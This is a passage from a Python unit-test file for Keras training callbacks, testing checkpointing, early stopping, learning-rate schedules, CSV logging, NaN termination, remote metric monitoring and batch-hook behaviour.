filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1) # a 1 by 1 array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_batch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegexp(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegexp(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegexp(ValueError, 'New function '):
model.predict(x, batch_size=2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
